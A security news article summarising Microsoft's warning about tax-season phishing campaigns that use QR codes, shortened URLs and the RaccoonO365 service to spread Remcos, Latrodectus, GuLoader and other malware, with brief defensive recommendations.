Microsoft Warns of Tax-Themed Phishing Surge Using QR Codes, Malware, and Credential Theft Tools

Microsoft has raised the alarm over a wave of phishing campaigns exploiting tax season themes to spread malware and steal user credentials. These attacks cleverly use redirection tactics like QR codes, shortened URLs, and trusted file-hosting platforms to slip past detection systems.

A New Breed of Phishing-as-a-Service

At the heart of these campaigns is a Phishing-as-a-Service (PhaaS) platform known as RaccoonO365, first exposed in December 2024. Threat actors are leveraging this tool to deploy remote access trojans (RATs) such as Remcos, and post-exploitation tools including Latrodectus, AHKBot, GuLoader, and BruteRatel C4 (BRc4).

One particularly active group, Storm-0249—a known initial access broker—was spotted on February 6, 2025, conducting a phishing campaign targeting U.S. users. Victims received emails with PDF attachments linking to shortened URLs that redirected them to fake DocuSign pages. From there, JavaScript payloads could lead to malware like BRc4 and Latrodectus, depending on the user's system profile and IP address. If the target didn’t meet the attackers’ criteria, a harmless PDF was sent instead.

Mass Targeting & QR Code Deception

Between February 12 and 28, Microsoft observed another large-scale phishing operation delivering QR code-laced PDFs to over 2,300 U.S. organizations, especially in engineering, IT, and consulting sectors. The QR codes redirected victims to phony Microsoft 365 login pages, designed to harvest credentials via RaccoonO365.

Expanding the Arsenal

Other malware strains were also distributed using tax-themed lures:

• AHKBot: Victims were led to Excel documents that downloaded MSI files executing AutoHotKey scripts, which enabled screenshot capturing and exfiltration.

• GuLoader: Embedded links in PDF attachments led to ZIP files containing .lnk files disguised as tax documents. When opened, these used PowerShell to deploy GuLoader and install Remcos.

Microsoft also highlighted a related Storm-0249 campaign leveraging fake Windows 11 Pro ads—promoted via Facebook—to deliver Latrodectus through BruteRatel. The latest variant, Latrodectus 1.9, now includes persistence via scheduled tasks and a new command to execute Windows instructions via cmd.exe /c.

QR Code Abuse and Broader Threat Trends

According to Palo Alto Networks Unit 42, these QR code-based phishing attacks often obscure the true destination by using redirects or open redirect vulnerabilities on legitimate sites, hiding malicious links from both users and security tools.

This surge in phishing also coincides with broader social engineering trends, including:

• Browser-in-the-Browser (BitB) attacks targeting Steam users

• Info-stealers hijacking MailChimp accounts for spam campaigns

• Malicious SVG files bypassing spam filters to redirect victims

• Use of trusted platforms (Adobe, DocuSign, Dropbox, Canva, Zoho) to sneak past secure email gateways

• Fake emails from Spotify, Apple Music, and banks aiming to capture credentials and payment data

• Bogus alerts about security issues on Windows and macOS

• Trojanized downloads for popular software leading to Gh0st RAT

• DarkCloud and Masslogger info-stealers targeting Spanish and Romanian entities respectively

Defense Recommendations

To combat these evolving threats, Microsoft advises organizations to:

• Implement phishing-resistant authentication methods

• Use modern browsers with malicious site protection

• Enable network-level protections to block access to harmful domains

Staying ahead of these increasingly creative and deceptive phishing strategies is critical, especially during periods like tax season, when threat actors are most active.